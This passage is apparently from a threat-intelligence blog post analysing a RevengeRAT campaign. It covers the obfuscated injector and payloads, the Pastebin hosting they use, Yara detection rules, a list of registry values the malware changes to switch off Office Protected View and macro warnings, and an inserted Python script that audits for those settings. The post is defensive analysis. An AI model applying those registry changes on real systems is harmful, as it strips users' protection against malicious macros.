Ssdeep: 768:zQosoqOovPJmzW0GzJrMfogNeEbSBUrOaqVJswUna4OI9O:zQyoUzW0GrQ6UiaqVJ1Ua4Vs

Table 2: Information about the RevengeRAT / Injector malicious payload

Figure 7: Static information about the payload described in Table 2

However, the .NET payload is not totally unprotected. In fact, it has been obfuscated with the “ConfuserEx” obfuscator.

The assembly is a Dynamic Link Library with only one purpose: injecting the payload into a target process through the well-known “Process Hollowing” technique. At this stage of the infection chain the final payload, the RevengeRAT remote administration tool, is retrieved.

Figure 8: Process Hollowing references inside the PE file

The RevengeRAT Payload

Figure 9: RevengeRAT payload in hex encoding

The final payload is the one downloaded from the Pastebin page “Qx0K2baN”, as reported in Code Snippet 5. This code comes with the same obfuscation method seen in PAYLOAD_2, hex encoding together with a simple replacing routine.

Hash: 35e9bcc5654b1ebec035a481bc5ad67dc2341c1b534ac904c5bf28e3a5703eff
Threat: RevengeRAT
Brief Description: RevengeRAT injector payload, obfuscated
Ssdeep: 768:3Yo9AzKlOOYIl+tqRsoYGvoJGPdyOYOCbf9eThI21Os+JZiIPxTS0X4Dwrw2T9:5AmlEIl+tqSoY2oyfYOweT6s+JlPVnz

Table 4: Information about the RevengeRAT malicious payload

Even this executable is a well formed .Net Assembly, but in this case it is obfuscated with another tool, “.Net Reactor”, a commercial code protection tool specialized in .Net applications.

Figure 10: Evidence about .NET Reactor obfuscator

Exploring the code, we found many similarities with the RevengeRAT threat previously analyzed by us and by Unit 42. This means, with reasonable confidence, that the campaign we are dissecting could be an evolution of the previous campaigns, showing an increase in the malware's stealthiness and the adoption of new techniques like process hollowing in the infection chain. Despite that, the RevengeRAT core is substantially the same.

Figure 11: Comparison among RevengeRAT belonging to different campaigns

This time the recurring word is “rg”. In fact, the two payloads downloaded from the Pastebin platform are “rgrunpe” and “rgbin”; the new command and control server domains also start with the two letters “rg”, the codename of this latest campaign. This time, unlike the “roma225” case, the socket key of the RAT is configured differently, with the static string “lunlayo”, and the id is “HOTEIS NOVOS” instead of “POWERScreenPOWER”.

Anyway, as shown in Figure 11, the ID and Mutex of the last two campaigns are the same, indicating that the group is active and the infection campaign continues. Moreover, considering the number of views counted by the Pastebin snippet “CM22vTup”, the one delivering the RevengeRAT payload, it is possible to estimate the magnitude of the attack, which may involve up to 1600 victims.

Figure 12: Hagga campaign reference

Conclusion

Since December 2018 we have been following the tracks of this ambiguous cyber criminal group, internally referenced as TH-173. There are chances this whole activity could be linked with the Gorgon Group, but at the moment we have no definitive evidence of this connection.

Anyway, by keeping a constant eye on this threat, we observed a refinement of their infection chain while they maintain some of their TTPs intact, such as the abuse of the Blogspot platform and of legitimate dynamic DNS services. In fact, the group started abusing Pastebin to add complexity to the infection chain, mixing up hidden MSHTA code, PowerShell scripts and also additional process injection techniques in their arsenal.

Indicators of Compromise

Yara Rules

rule rg_RevengeRAT_excel_macro_dropper_July_2019 {

    meta:
        description = "Yara Rule for revengeRAT_rg"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-08-01"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = {D0 CF 11 E0 A1 B1}
        $a2 = {EC A8 F9 46 C9 16}
        $a3 = {91 26 DD 88 D0 AD}
        $a4 = "GyjQSnPUjfNcA"
        $a5 = "CMG=\"2D2F8"

    condition:
        all of them
}

import "pe"
rule rg_RevengeRAT_payload_1_July_2019 {

    meta:
        description = "Yara Rule for revengeRAT_rg payload_1"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-08-01"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = {4D 5A}
        $a2 = "kFeS0JCm" wide ascii
        $a3 = {A1 6B 31 63 EE 9F}
        $a4 = {06 38 70 DE FF FF 28}

    condition:
        2 of ($a*) and pe.number_of_sections == 3
}

import "pe"
rule rg_RevengeRAT_payload_2_July_2019 {

    meta:
        description = "Yara Rule for revengeRAT_rg"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-08-01"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = {4D 5A}
        $a2 = {93 E5 21 3F 59 AE}
        $a3 = {11 08 28 22}
        $a4 = "v2.0.507"
        $a5 = {E2 80 8C E2 80}
        $a6 = {81 AC E2 81 AF E2 80 AE}
        $a7 = {E2 81 AA E2 80}
        $a8 = {81 AF E2 80 AA}
        $a9 = {81 AC E2 81 AF E2 80 AE}
        $a10 = {C5 C7 4C 9E 65 A5 B6 42}

    condition:
        6 of ($a*)
}

Edited Registry keys

HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings
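The keys listed above are user-hive settings, so a per-user registry export is enough to check whether a host has been tampered with in this way. The Python script below is an added example for this edition, not code from the original post: it parses a `.reg` export of the Office security keys (as produced by `reg export` or regedit, decoded from its UTF-16 text) and reports the values in their weakened state. The interpretation of those values is the documented meaning of the Office policy settings, stated here as the author's assumption: a `DisableInternetFilesInPV`, `DisableAttachementsInPV` or `DisableUnsafeLocationsInPV` value of 1 switches Protected View off for that source, and `VBAWarnings` = 1 means “Enable all macros”. The export embedded in the script is constructed for the example.

```python
import re

# Value names the campaign sets, with the value that weakens the control
# (assumed from the documented Office policy meanings; see the lead-in).
RISKY_VALUES = {
    'DisableInternetFilesInPV': 1,     # 1 = Protected View off for internet files
    'DisableAttachementsInPV': 1,      # 1 = Protected View off for Outlook attachments
    'DisableUnsafeLocationsInPV': 1,   # 1 = Protected View off for unsafe locations
    'VBAWarnings': 1,                  # 1 = enable all macros without notification
}

# Only Office security keys for Excel, Word and PowerPoint are of interest here.
OFFICE_KEY_RE = re.compile(
    r'^\[(HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\d+\.\d+\\'
    r'(?:Excel|Word|PowerPoint)\\Security(?:\\ProtectedView)?)\]$'
)
VALUE_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Parse .reg export text into {key: {value_name: int}} for the Office keys above."""
    result = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        km = OFFICE_KEY_RE.match(line)
        if km:
            current = km.group(1)
            result.setdefault(current, {})
            continue
        if line.startswith('['):          # some other key: stop collecting values
            current = None
            continue
        vm = VALUE_RE.match(line)
        if vm and current is not None:
            result[current][vm.group(1)] = int(vm.group(2), 16)
    return result


def audit(text):
    """Return [(key, value_name, value)] for every setting found in its weakened state."""
    findings = []
    for key, values in parse_reg_export(text).items():
        for name, value in values.items():
            if name in RISKY_VALUES and value == RISKY_VALUES[name]:
                findings.append((key, name, value))
    return findings


# Constructed export (not from a real host): Excel has been weakened, Word has not.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Excel\\Security]
"VBAWarnings"=dword:00000001

[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView]
"DisableInternetFilesInPV"=dword:00000001
"DisableAttachementsInPV"=dword:00000000

[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Security]
"VBAWarnings"=dword:00000002
"""


if __name__ == '__main__':
    for key, name, value in audit(SAMPLE_EXPORT):
        print('weakened: %s\\%s = %d' % (key, name, value))
```

On a real host, export `HKCU\Software\Microsoft\Office` for the user in question and feed the decoded text to `audit`; a value set to 1 under `ProtectedView`, or `VBAWarnings` = 1, on a machine where policy never configured it is the artefact this fourth chunk leaves behind.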

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB